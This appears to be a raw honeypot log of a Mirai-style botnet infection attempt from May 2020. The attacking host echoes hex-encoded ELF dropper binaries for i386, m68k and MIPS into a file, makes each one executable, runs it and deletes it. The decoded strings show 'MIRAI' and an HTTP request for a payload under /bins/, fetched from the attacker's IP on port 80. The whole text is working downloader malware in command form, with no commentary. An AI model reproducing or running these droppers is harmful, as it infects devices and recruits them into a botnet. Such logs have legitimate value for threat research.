2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xf1\xff\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xf1\xff\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xf1\xff\x3c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xf1\xff\x4f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xf1\xff\x57\x00\x00\x00\x03\x81\x04\x08\x18\x00\x00\x00\x12\x00\x01\x00\x5d\x00\x00\x00\x2c\x83\x04\x08\x32\x00\x00\x00\x12\x00\x01\x00\x65\x00\x00\x00\xc0\x93\x04\x08\x04\x00\x00\x00\x11\x00\x03\x00' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\x6b\x00\x00\x00\xf1\x80\x04\x08\x12\x00\x00\x00\x12\x00\x01\x00\x72\x00\x00\x00\xdc\x80\x04\x08\x15\x00\x00\x00\x12\x00\x01\x00\x7a\x00\x00\x00\x72\x81\x04\x08\x27\x00\x00\x00\x12\x00\x01\x00\x82\x00\x00\x00\x94\x80\x04\x08\x48\x00\x00\x00\x12\x00\x01\x00\x92\x00\x00\x00\x21\x83\x04\x08\x09\x00\x00\x00\x12\x00\x01\x00\x9a\x00\x00\x00\x42\x81\x04\x08\x18\x00\x00\x00\x12\x00\x01\x00\xa1\x00\x00\x00\x1b\x81\x04\x08\x27\x00\x00\x00\x12\x00\x01\x00\xaa\x00\x00\x00\x5e\x83\x04\x08\x15\x00\x00\x00\x12\x02\x01\x00' >> GKMSPhsZvn
2020-05-21|14:38:08|196.53 .114.199| CMD: echo -ne '\xba\x00\x00\x00\xbe\x93\x04\x08\x00\x00\x00\x00\x10\x00\xf1\xff\xc6\x00\x00\x00\x99\x81\x04\x08\x88\x01\x00\x00\x12\x00\x01\x00\xca\x00\x00\x00\x5a\x81\x04\x08\x18\x00\x00\x00\x12\x00\x01\x00\xd0\x00\x00\x00\xbe\x93\x04\x08\x00\x00\x00\x00\x10\x00\xf1\xff\xd7\x00\x00\x00\xc4\x93\x04\x08\x00\x00\x00\x00\x10\x00\xf1\xff\xdc\x00\x00\x00\x73\x83\x04\x08\x06\x00\x00\x00\x22\x00\x01\x00\xed\x00\x00\x00\xc0\x93\x04\x08\x04\x00\x00\x00\x21\x00\x03\x00\xf4\x00\x00\x00\xc0\x93\x04\x08\x04\x00\x00\x00\x11\x02\x03\x00' >> GKMSPhsZvn
2020-05-21|14:38:09|196.53 .114.199| CMD: echo -ne '\xff\x00\x00\x00\x73\x83\x04\x08\x06\x00\x00\x00\x22\x02\x01\x00\x00\x6d\x61\x69\x6e\x2e\x63\x00\x6c\x69\x62\x63\x2f\x73\x79\x73\x64\x65\x70\x73\x2f\x6c\x69\x6e\x75\x78\x2f\x69\x33\x38\x36\x2f\x73\x79\x73\x63\x61\x6c\x6c\x2e\x53\x00\x5f\x5f\x73\x79\x73\x63\x61\x6c\x6c\x5f\x65\x72\x72\x6f\x72\x2e\x63\x00\x5f\x5f\x65\x72\x72\x6e\x6f\x5f\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x63\x00\x65\x72\x72\x6e\x6f\x2e\x63\x00\x78\x6f\x70\x65\x6e\x00\x73\x79\x73\x63\x61\x6c\x6c\x00\x65\x72\x72\x6e\x6f\x00\x78\x63\x6c\x6f\x73' >> GKMSPhsZvn
2020-05-21|14:38:09|196.53 .114.199| CMD: echo -ne '\x65\x00\x78\x5f\x5f\x65\x78\x69\x74\x00\x78\x73\x6f\x63\x6b\x65\x74\x00\x75\x74\x69\x6c\x73\x5f\x69\x6e\x65\x74\x5f\x61\x64\x64\x72\x00\x5f\x5f\x73\x74\x61\x72\x74\x00\x78\x77\x72\x69\x74\x65\x00\x78\x63\x6f\x6e\x6e\x65\x63\x74\x00\x5f\x5f\x73\x79\x73\x63\x61\x6c\x6c\x5f\x65\x72\x72\x6f\x72\x00\x5f\x5f\x62\x73\x73\x5f\x73\x74\x61\x72\x74\x00\x72\x75\x6e\x00\x78\x72\x65\x61\x64\x00\x5f\x65\x64\x61\x74\x61\x00\x5f\x65\x6e\x64\x00\x5f\x5f\x65\x72\x72\x6e\x6f\x5f\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x00\x5f\x65\x72' >> GKMSPhsZvn
2020-05-21|14:38:09|196.53 .114.199| CMD: echo -ne '\x72\x6e\x6f\x00\x5f\x5f\x47\x49\x5f\x65\x72\x72\x6e\x6f\x00\x5f\x5f\x47\x49\x5f\x5f\x5f\x65\x72\x72\x6e\x6f\x5f\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x00' >> GKMSPhsZvn
2020-05-21|14:38:09|196.53 .114.199| CMD: chmod 777 GKMSPhsZvn||busybox chmod 777 GKMSPhsZvn
2020-05-21|14:38:09|196.53 .114.199| CMD: ./GKMSPhsZvn
2020-05-21|14:38:12|196.53 .114.199| CMD: rm -rf ./GKMSPhsZvn
2020-05-21|14:38:12|196.53 .114.199| CMD: ./kJzbHGbUEF
2020-05-21|14:38:13|196.53 .114.199| CMD: rm -rf ./kJzbHGbUEF
2020-05-21|14:38:13|196.53 .114.199| CMD: echo -ne '\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x04\x00\x00\x00\x01\x80\x00\x03\x3e\x00\x00\x00\x34\x00\x00\x04\x20\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x03\xff\x00\x00\x03\xff\x00\x00\x00\x05\x00\x00\x20\x00\x00\x00\x00\x01\x00\x00\x04\x00\x80\x00\x24\x00\x80\x00\x24\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x20\x00\x64\x74\xe5\x51\x00\x00\x00\x00\x00\x00\x00\x00' > GKMSPhsZvn
2020-05-21|14:38:13|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x4e\x56\x00\x00\x12\x2e\x00\x0b\x70\x18\xe1\xa9\x42\x80\x10\x2e\x00\x0f\x48\x40\x42\x40\x82\x80\x82\x2e\x00\x17\x42\x80\x10\x2e\x00\x13\xe1\x88\x80\x81\x4e\x5e\x4e\x75\x4e\x56\x00\x00\x2f\x2e\x00\x08\x48\x78\x00\x01\x61\xff\x00\x00\x02\x80\x50\x8f\x4e\x5e\x4e\x75\x4e\x56\x00\x00\x2f\x2e\x00\x08\x48\x78\x00\x06\x61\xff\x00\x00\x02\x68\x4e\x5e\x4e\x75\x4e\x56\x00\x00\x2f\x2e\x00\x10\x2f\x2e\x00\x0c\x2f\x2e\x00\x08\x48\x78\x00\x05' >> GKMSPhsZvn
2020-05-21|14:38:13|196.53 .114.199| CMD: echo -ne '\x61\xff\x00\x00\x02\x4a\x4e\x5e\x4e\x75\x4e\x56\xff\xf4\x2d\x6e\x00\x08\xff\xf4\x2d\x6e\x00\x0c\xff\xf8\x2d\x6e\x00\x10\xff\xfc\x48\x6e\xff\xf4\x48\x78\x00\x03\x48\x78\x00\x66\x61\xff\x00\x00\x02\x1e\x4e\x5e\x4e\x75\x4e\x56\x00\x00\x2f\x2e\x00\x10\x2f\x2e\x00\x0c\x2f\x2e\x00\x08\x48\x78\x00\x04\x61\xff\x00\x00\x02\x00\x4e\x5e\x4e\x75\x4e\x56\x00\x00\x2f\x2e\x00\x10\x2f\x2e\x00\x0c\x2f\x2e\x00\x08\x48\x78\x00\x03\x61\xff\x00\x00\x01\xe2\x4e\x5e\x4e\x75\x4e\x56\xff\xf4\x2d\x6e\x00\x08\xff\xf4\x2d\x6e\x00\x0c' >> GKMSPhsZvn
2020-05-21|14:38:13|196.53 .114.199| CMD: echo -ne '\xff\xf8\x2d\x6e\x00\x10\xff\xfc\x48\x6e\xff\xf4\x48\x78\x00\x01\x48\x78\x00\x66\x61\xff\x00\x00\x01\xb6\x4e\x5e\x4e\x75\x4e\x56\xff\x6c\x48\xe7\x38\x30\x45\xf9\x80\x00\x03\xb8\x60\x02\x52\x8a\x4a\x12\x66\xfa\x95\xfc\x80\x00\x03\xb8\x48\x78\x00\x06\x48\x79\x80\x00\x03\xbd\x48\x78\x00\x01\x61\xff\xff\xff\xff\x6c\x3d\x7c\x00\x02\xff\xee\x3d\x7c\x00\x50\xff\xf0\x48\x78\x00\xc7\x48\x78\x00\x72\x48\x78\x00\x35\x48\x78\x00\xc4\x61\xff\xff\xff\xfe\xa8\x4f\xef\x00\x10\x2d\x40\xff\xf2\x48\x78\x01\xff\x48\x78\x02\x41' >> GKMSPhsZvn
2020-05-21|14:38:13|196.53 .114.199| CMD: echo -ne '\x48\x79\x80\x00\x03\xc4\x61\xff\xff\xff\xfe\xe4\x28\x00\x42\xa7\x48\x78\x00\x01\x48\x78\x00\x02\x61\xff\xff\xff\xff\x58\x26\x00\x4f\xef\x00\x24\x70\xff\xb0\x83\x67\x04\xb0\x84\x66\x0c\x48\x78\x00\x01\x61\xff\xff\xff\xfe\x8a\x58\x8f\x48\x78\x00\x10\x48\x6e\xff\xee\x2f\x03\x61\xff\xff\xff\xfe\xc4\x24\x00\x4f\xef\x00\x0c\x6c\x22\x48\x78\x00\x04\x48\x79\x80\x00\x03\xcf\x48\x78\x00\x01\x61\xff\xff\xff\xfe\xd4\x44\x82\x2f\x02\x61\xff\xff\xff\xfe\x52\x4f\xef\x00\x10\x45\xea\x00\x1d\x2f\x0a\x48\x79\x80\x00\x03\xd4' >> GKMSPhsZvn
2020-05-21|14:38:14|196.53 .114.199| CMD: echo -ne '\x2f\x03\x61\xff\xff\xff\xfe\xb2\x4f\xef\x00\x0c\xb5\xc0\x67\x0c\x48\x78\x00\x03\x61\xff\xff\xff\xfe\x28\x58\x8f\x42\x82\x48\x78\x00\x01\x48\x6e\xff\xff\x2f\x03\x61\xff\xff\xff\xfe\xaa\x4f\xef\x00\x0c\x72\x01\xb2\x80\x67\x0c\x48\x78\x00\x04\x61\xff\xff\xff\xfe\x00\x58\x8f\xe1\x8a\x10\x2e\xff\xff\x49\xc0\x84\x80\x0c\x82\x0d\x0a\x0d\x0a\x66\xc8\x48\x78\x00\x80\x24\x0e\x06\x82\xff\xff\xff\x6e\x2f\x02\x2f\x03\x61\xff\xff\xff\xfe\x6c\x4f\xef\x00\x0c\x47\xf9\x80\x00\x01\x36\x4a\x80\x6f\x0e\x2f\x00\x2f\x02\x2f\x04' >> GKMSPhsZvn
2020-05-21|14:38:14|196.53 .114.199| CMD: echo -ne '\x4e\x93\x4f\xef\x00\x0c\x60\xce\x2f\x03\x45\xf9\x80\x00\x00\xd6\x4e\x92\x2f\x04\x4e\x92\x48\x78\x00\x04\x48\x79\x80\x00\x03\xfa\x48\x78\x00\x01\x4e\x93\x48\x78\x00\x05\x61\xff\xff\xff\xfd\x92\x4f\xef\x00\x18\x4c\xee\x0c\x1c\xff\x58\x4e\x5e\x4e\x75\x4e\x56\x00\x00\x61\xff\xff\xff\xfe\x5a\x4e\x5e\x4e\x75\x4e\x56\xff\xf8\x48\xe7\x3c\x00\x20\x6e\x00\x20\x2a\x2e\x00\x1c\x28\x2e\x00\x18\x26\x2e\x00\x14\x24\x2e\x00\x10\x22\x2e\x00\x0c\x20\x2e\x00\x08\x4e\x40\x2d\x40\xff\xf8\x20\x2e\xff\xf8\x72\x82\xb2\x80\x64\x1a' >> GKMSPhsZvn
2020-05-21|14:38:14|196.53 .114.199| CMD: echo -ne '\x20\x2e\xff\xf8\x44\x80\x2d\x40\xff\xfc\x61\xff\x00\x00\x00\x1c\x20\xae\xff\xfc\x72\xff\x2d\x41\xff\xf8\x20\x2e\xff\xf8\x4c\xee\x00\x3c\xff\xe8\x4e\x5e\x4e\x75\x4e\x56\x00\x00\x20\x3c\x80\x00\x24\x00\x20\x40\x4e\x5e\x4e\x75\x6d\x36\x38\x6b\x00\x4d\x49\x52\x41\x49\x0a\x00\x6b\x4a\x7a\x62\x48\x47\x62\x55\x45\x46\x00\x4e\x49\x46\x0a\x00\x47\x45\x54\x20\x2f\x62\x69\x6e\x73\x2f\x69\x67\x4c\x48\x76\x69\x6a\x7a\x62\x46\x6d\x36\x38\x6b\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x46\x49\x4e\x0a\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:14|196.53 .114.199| CMD: echo -ne '\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x80\x00\x00\x94\x00\x00\x00\x94\x00\x00\x03\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x80\x00\x03\xb8' >> GKMSPhsZvn
2020-05-21|14:38:14|196.53 .114.199| CMD: echo -ne '\x00\x00\x03\xb8\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x80\x00\x24\x00\x00\x00\x04\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:14|196.53 .114.199| CMD: chmod 777 GKMSPhsZvn||busybox chmod 777 GKMSPhsZvn
2020-05-21|14:38:14|196.53 .114.199| CMD: ./GKMSPhsZvn
2020-05-21|14:38:17|196.53 .114.199| CMD: rm -rf ./GKMSPhsZvn
2020-05-21|14:38:17|196.53 .114.199| CMD: ./kJzbHGbUEF
2020-05-21|14:38:18|196.53 .114.199| CMD: rm -rf ./kJzbHGbUEF
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00\x00\x00\xe4\x04\x40\x00\x34\x00\x00\x00\xe8\x06\x00\x00\x07\x10\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x07\x00\x06\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x54\x06\x00\x00\x54\x06\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x60\x06\x00\x00\x60\x06\x44\x00\x60\x06\x44\x00\x54\x00\x00\x00\x70\x00\x00\x00\x06\x00\x00\x00\x00\x00\x01\x00\x51\xe5\x74\x64\x00\x00\x00\x00\x00\x00\x00\x00' > GKMSPhsZvn
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\xa5\x30\x00\x2c\x05\x00\x00\x26\x04\x00\x25\x20\x85\x00\xff\x00\xe7\x30\xff\x00\xc6\x30\x25\x20\x87\x00\x00\x32\x06\x00\x25\x30\xc4\x00\x02\x22\x06\x00\x00\xff\xc3\x30\x00\x1a\x03\x00\x00\xff\x84\x30\x00\x16\x06\x00\x02\x36\x06\x00\x25\x10\x43\x00\x25\x30\xc4\x00\x08\x00\xe0\x03\x25\x10\x46\x00\x05\x00\x1c\x3c\x64\x85\x9c\x27\x21\xe0\x99\x03\x5c\x80\x99\x8f\x21\x28\x80\x00' >> GKMSPhsZvn
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x08\x00\x20\x03\xa1\x0f\x04\x24\x05\x00\x1c\x3c\x48\x85\x9c\x27\x21\xe0\x99\x03\x5c\x80\x99\x8f\x21\x28\x80\x00\x08\x00\x20\x03\xa6\x0f\x04\x24\x05\x00\x1c\x3c\x2c\x85\x9c\x27\x21\xe0\x99\x03\x21\x10\xa0\x00\x5c\x80\x99\x8f\x21\x38\xc0\x00\x21\x28\x80\x00\x21\x30\x40\x00\x08\x00\x20\x03\xa5\x0f\x04\x24\x05\x00\x1c\x3c\x04\x85\x9c\x27\x21\xe0\x99\x03\xd0\xff\xbd\x27\x28\x00\xbf\xaf\x10\x00\xbc\xaf\x5c\x80\x99\x8f\x18\x00\xa4\xaf\x1c\x00\xa5\xaf\x20\x00\xa6\xaf\x06\x10\x04\x24\x18\x00\xa6\x27\x09\xf8\x20\x03' >> GKMSPhsZvn
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x03\x00\x05\x24\x10\x00\xbc\x8f\x28\x00\xbf\x8f\x00\x00\x00\x00\x08\x00\xe0\x03\x30\x00\xbd\x27\x05\x00\x1c\x3c\xb8\x84\x9c\x27\x21\xe0\x99\x03\x21\x10\xa0\x00\x5c\x80\x99\x8f\x21\x38\xc0\x00\x21\x28\x80\x00\x21\x30\x40\x00\x08\x00\x20\x03\xa4\x0f\x04\x24\x05\x00\x1c\x3c\x90\x84\x9c\x27\x21\xe0\x99\x03\x21\x10\xa0\x00\x5c\x80\x99\x8f\x21\x38\xc0\x00\x21\x28\x80\x00\x21\x30\x40\x00\x08\x00\x20\x03\xa3\x0f\x04\x24\x05\x00\x1c\x3c\x68\x84\x9c\x27\x21\xe0\x99\x03\xd0\xff\xbd\x27\x28\x00\xbf\xaf\x10\x00\xbc\xaf' >> GKMSPhsZvn
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x5c\x80\x99\x8f\x18\x00\xa4\xaf\x1c\x00\xa5\xaf\x20\x00\xa6\xaf\x06\x10\x04\x24\x18\x00\xa6\x27\x09\xf8\x20\x03\x01\x00\x05\x24\x10\x00\xbc\x8f\x28\x00\xbf\x8f\x00\x00\x00\x00\x08\x00\xe0\x03\x30\x00\xbd\x27\x05\x00\x1c\x3c\x1c\x84\x9c\x27\x21\xe0\x99\x03\x38\xff\xbd\x27\xc0\x00\xbf\xaf\xbc\x00\xb3\xaf\xb8\x00\xb2\xaf\xb4\x00\xb1\xaf\xb0\x00\xb0\xaf\x10\x00\xbc\xaf\x18\x80\x82\x8f\x00\x00\x00\x00\x00\x06\x50\x24\x00\x00\x02\x82\x00\x00\x00\x00\xfd\xff\x40\x14\x01\x00\x10\x26\xff\xff\x10\x26\x18\x80\x85\x8f' >> GKMSPhsZvn
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x18\x80\x82\x8f\x48\x80\x99\x8f\x08\x06\xa5\x24\x01\x00\x04\x24\x06\x00\x06\x24\x00\x06\x42\x24\x09\xf8\x20\x03\x23\x98\x02\x02\x10\x00\xbc\x8f\x02\x00\x02\x24\x4c\x80\x99\x8f\x1c\x00\xa2\xa7\x00\x50\x02\x24\xc7\x00\x07\x24\xc4\x00\x04\x24\x35\x00\x05\x24\x72\x00\x06\x24\x09\xf8\x20\x03\x1e\x00\xa2\xa7\x10\x00\xbc\x8f\x01\x03\x05\x24\x18\x80\x84\x8f\x60\x80\x99\x8f\x10\x06\x84\x24\xff\x01\x06\x24\x09\xf8\x20\x03\x20\x00\xa2\xaf\x10\x00\xbc\x8f\x02\x00\x04\x24\x50\x80\x99\x8f\x02\x00\x05\x24\x21\x30\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x09\xf8\x20\x03\x21\x90\x40\x00\x21\x88\x40\x00\xff\xff\x02\x24\x10\x00\xbc\x8f\x03\x00\x22\x12\x00\x00\x00\x00\x07\x00\x42\x16\x00\x00\x00\x00\x54\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x01\x00\x04\x24\x10\x00\xbc\x8f\x00\x00\x00\x00\x44\x80\x99\x8f\x21\x20\x20\x02\x1c\x00\xa5\x27\x09\xf8\x20\x03\x10\x00\x06\x24\x10\x00\xbc\x8f\x0f\x00\x41\x04\x21\x80\x40\x00\x18\x80\x85\x8f\x48\x80\x99\x8f\x1c\x06\xa5\x24\x01\x00\x04\x24\x09\xf8\x20\x03\x04\x00\x06\x24\x10\x00\xbc\x8f\x00\x00\x00\x00\x54\x80\x99\x8f' >> GKMSPhsZvn
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x09\xf8\x20\x03\x23\x20\x10\x00\x10\x00\xbc\x8f\x00\x00\x00\x00\x18\x80\x85\x8f\x48\x80\x99\x8f\x1d\x00\x70\x26\x24\x06\xa5\x24\x21\x20\x20\x02\x09\xf8\x20\x03\x21\x30\x00\x02\x10\x00\xbc\x8f\x07\x00\x50\x10\x21\x80\x00\x00\x54\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x03\x00\x04\x24\x10\x00\xbc\x8f\x21\x80\x00\x00\x38\x80\x99\x8f\x21\x20\x20\x02\x18\x00\xa5\x27\x09\xf8\x20\x03\x01\x00\x06\x24\x10\x00\xbc\x8f\x01\x00\x03\x24\x54\x80\x99\x8f\x04\x00\x43\x10\x04\x00\x04\x24\x09\xf8\x20\x03' >> GKMSPhsZvn
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x10\x00\xbc\x8f\x18\x00\xa3\x83\x00\x12\x10\x00\x25\x80\x43\x00\x0a\x0d\x02\x3c\x0a\x0d\x42\x34\xed\xff\x02\x16\x00\x00\x00\x00\x38\x80\x99\x8f\x2c\x00\xb0\x27\x21\x20\x20\x02\x21\x28\x00\x02\x09\xf8\x20\x03\x80\x00\x06\x24\x10\x00\xbc\x8f\x21\x28\x00\x02\x48\x80\x99\x8f\x21\x30\x40\x00\x06\x00\x40\x18\x21\x20\x40\x02\x09\xf8\x20\x03\x00\x00\x00\x00\x10\x00\xbc\x8f\xf0\xff\x00\x10\x00\x00\x00\x00\x58\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x21\x20\x20\x02\x10\x00\xbc\x8f\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:19|196.53 .114.199| CMD: echo -ne '\x58\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x21\x20\x40\x02\x10\x00\xbc\x8f\x01\x00\x04\x24\x18\x80\x85\x8f\x48\x80\x99\x8f\x4c\x06\xa5\x24\x09\xf8\x20\x03\x04\x00\x06\x24\x10\x00\xbc\x8f\x00\x00\x00\x00\x54\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x05\x00\x04\x24\x10\x00\xbc\x8f\xc0\x00\xbf\x8f\xbc\x00\xb3\x8f\xb8\x00\xb2\x8f\xb4\x00\xb1\x8f\xb0\x00\xb0\x8f\x08\x00\xe0\x03\xc8\x00\xbd\x27\x05\x00\x1c\x3c\x6c\x81\x9c\x27\x21\xe0\x99\x03\x21\x00\xe0\x03\x01\x00\x11\x04\x00\x00\x00\x00\x05\x00\x1c\x3c' >> GKMSPhsZvn
2020-05-21|14:38:20|196.53 .114.199| CMD: echo -ne '\x54\x81\x9c\x27\x21\xe0\x9f\x03\x21\xf8\x00\x00\x3c\x80\x99\x8f\x00\x00\x00\x00\x08\x00\x20\x03\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x3c\x30\x81\x9c\x27\x21\xe0\x99\x03\x21\x10\x80\x00\x21\x20\xa0\x00\x21\x28\xc0\x00\x21\x30\xe0\x00\x10\x00\xa7\x8f\x14\x00\xa8\x8f\x18\x00\xa9\x8f\x1c\x00\xaa\x8f\xe0\xff\xbd\x27\x10\x00\xa8\xaf\x14\x00\xa9\xaf\x18\x00\xaa\xaf\x1c\x00\xa2\xaf\x1c\x00\xa2\x8f\x0c\x00\x00\x00\x03\x00\xe0\x14\x20\x00\xbd\x27\x08\x00\xe0\x03\x00\x00\x00\x00\x21\x20\x40\x00\x40\x80\x99\x8f' >> GKMSPhsZvn
2020-05-21|14:38:20|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x08\x00\x20\x03\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x3c\xc0\x80\x9c\x27\x21\xe0\x99\x03\xe0\xff\xbd\x27\x1c\x00\xbf\xaf\x18\x00\xb0\xaf\x10\x00\xbc\xaf\x34\x80\x99\x8f\x00\x00\x00\x00\x09\xf8\x20\x03\x21\x80\x80\x00\x10\x00\xbc\x8f\x00\x00\x50\xac\x1c\x00\xbf\x8f\x18\x00\xb0\x8f\xff\xff\x02\x24\x08\x00\xe0\x03\x20\x00\xbd\x27\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x3c\x70\x80\x9c\x27\x21\xe0\x99\x03\x30\x80\x82\x8f\x08\x00\xe0\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:20|196.53 .114.199| CMD: echo -ne '\x6d\x70\x73\x6c\x00\x00\x00\x00\x4d\x49\x52\x41\x49\x0a\x00\x00\x6b\x4a\x7a\x62\x48\x47\x62\x55\x45\x46\x00\x00\x4e\x49\x46\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x62\x69\x6e\x73\x2f\x69\x67\x4c\x48\x76\x69\x6a\x7a\x62\x46\x6d\x70\x73\x6c\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:20|196.53 .114.199| CMD: echo -ne '\xc0\x06\x44\x00\xe0\x05\x40\x00\xc0\x01\x40\x00\x34\x02\x40\x00\x90\x05\x40\x00\x4c\x01\x40\x00\x98\x01\x40\x00\xa0\x00\x40\x00\xe8\x01\x40\x00\xec\x00\x40\x00\x08\x01\x40\x00\x20\x05\x40\x00\x24\x01\x40\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x67\x6f\x74\x00\x2e\x62\x73\x73\x00\x2e\x6d\x64\x65\x62\x75\x67\x2e\x61\x62\x69\x33\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:20|196.53 .114.199| CMD: echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xa0\x00\x40\x00\xa0\x00\x00\x00\x60\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\x00\x06\x40\x00\x00\x06\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x10\x60\x06\x44\x00\x60\x06\x00\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:20|196.53 .114.199| CMD: echo -ne '\x10\x00\x00\x00\x04\x00\x00\x00\x1e\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\xc0\x06\x44\x00\xb4\x06\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x23\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x00\xb4\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x06\x00\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> GKMSPhsZvn
2020-05-21|14:38:20|196.53 .114.199| CMD: chmod 777 GKMSPhsZvn||busybox chmod 777 GKMSPhsZvn
2020-05-21|14:38:20|196.53 .114.199| CMD: ./GKMSPhsZvn
2020-05-21|14:38:23|196.53 .114.199| CMD: rm -rf ./GKMSPhsZvn
2020-05-21|14:38:23|196.53 .114.199| CMD: ./kJzbHGbUEF
2020-05-21|14:38:24|196.53 .114.199| CMD: rm -rf ./kJzbHGbUEF
